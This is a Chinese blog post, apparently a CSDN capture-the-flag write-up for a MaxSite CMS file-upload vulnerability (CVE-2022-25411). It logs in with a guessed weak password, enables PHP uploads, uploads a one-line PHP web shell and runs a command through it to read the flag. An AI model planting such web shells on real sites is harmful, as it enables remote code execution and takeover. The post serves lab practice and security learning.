春秋云境:CVE-2022-25411(Maxsite CMS文件上传漏洞)

文章详细介绍了MaxSiteCMS内容管理系统存在的文件上传漏洞,攻击者可以利用此漏洞通过特定的PHP文件执行任意代码。文中提到,系统默认的弱口令为admin888,用户可以通过修改文件类型设置来上传PHP木马,并通过执行已上传的PHP文件获取flag。
摘要由CSDN通过智能技术生成

目录

一、题目

 二、官方POC 


一、题目

介绍:

MaxSite CMS是俄国MaxSite CMS开源项目的一款网站内容管理系统

Maxsite CMS存在文件上传漏洞,攻击者可利用该漏洞通过精心制作的PHP文件执行任意代码。

进入题目:

发现是俄文  乌拉~~

 不过没关系 我们国产化一下:

 二、官方POC 

国家信息安全漏洞库 

 登录目录是/admin/options

一开始以为弱口令就是admin:admin 

 然而不对:

 尝试了几个密码password admin123 666 888什么的

结果还被试出来了:admin888

先修改可上传文件类型 

 添加php

 进入下载页面:

点击上传页面:

上传木马文件:

<?php system($_GET[1]);phpinfo();?> 

点击下载

点击已上传的文件

查看 xxx.php?1=cat /flag

flag{90aeafa9-7baf-413d-ba1d-7817411d86f0} 

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
此次马克斯CMS2.0全新架构,速度性能都有极大提升 压缩里的标签文档为开发版文档,详细使用标签文档迟些会整理发出。 安装时默认是选的 站外 ,即不能连播,如果需要连播或是自动播放,请自己选站内。 请在IIS下调试,动态版请指定默认文档为index.asp,动态版是有缓存的,请修改过数据或是模板后在后台清除缓存然后前台看效果。 程序更新历史记录: 2009.06.14**11:51土豆播放器失效修正,/js/play.swf 2009.05.20**18:06增加标签[videolist:playlink],[channellist:playlink],{playpage:nolinkactor};内容也播放页以下标签增加长度控制{playpage:des}{playpage:nolinkactor} {playpage:name};修正后台自定义快捷菜单容错性;更新/admin/admin_makehtml.asp,/admin/admin_selfmenu.asp,/inc/mainclass.asp,commonfun.asp,/content/index.asp,/play/index.asp 2009.05.15**11:51修改sqlserver版的makeDatabase.asp,建空库时插入后台账号信息、便于登陆后台 2009.05.14**2:30发布sqlserver完整包 2009.05.12**22:10改进评论显示,剥离留言本样式与模板的关联,去除部分弹出层改为js的alert、便于用户操作,修正部分服务器上存在的google地图生成错误,更新文件gbook.asp,comment.asp,/js/function.js,/admin/admin_makehtml.asp 2009.05.07**13:31更新GVOD联播及缓冲下集、新浪高清播放器 2009.05.04**18:19更新2009新版资源库**台稳定版 2009.03.27**23:50改进程序易用性,修复图片采集bug,影片介绍为空生成错误解决,新浪高清更换播放器,改进后台添加下载地址等(因此次无必须功能升级,故未在后台更新提示) 2009.03.23**18:13增加影片seo关键字标签{playpage:note},更新文件/inc/CommonFun.asp,/inc/MainClass.asp,/play/index.asp,/content/index.asp,/admin/admin_makehtml.asp 2009.03.20**23:49增加远古高清和ku6的支持,更新文件/js/webplayer2008.html,/js/play.swf,/inc/playerKinds.xml,/admin/images/main.js 2009.03.20凌晨01:15更新自定义播放页是否生成 2009.03.17增加影片某一集名称标签{playpage:part},更新文件/play/index.asp 2009.03.17播放器支持gvod, 更新文件/js/play.swf , /js/gvod.html , /inc/playerKinds.xml , /admin/images/main.js , /admin/images/version.xml 2009.03.16修正新浪专辑采集问题,以及后台采集资源后时间更新问题,修改文件/admin/admin_resourcelib.asp,admin_webgather.asp 2009.03.07修正qvod播放器问题,修改了/js/play.swf,/js/play.js文件解决在IFRAME下播放问题
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值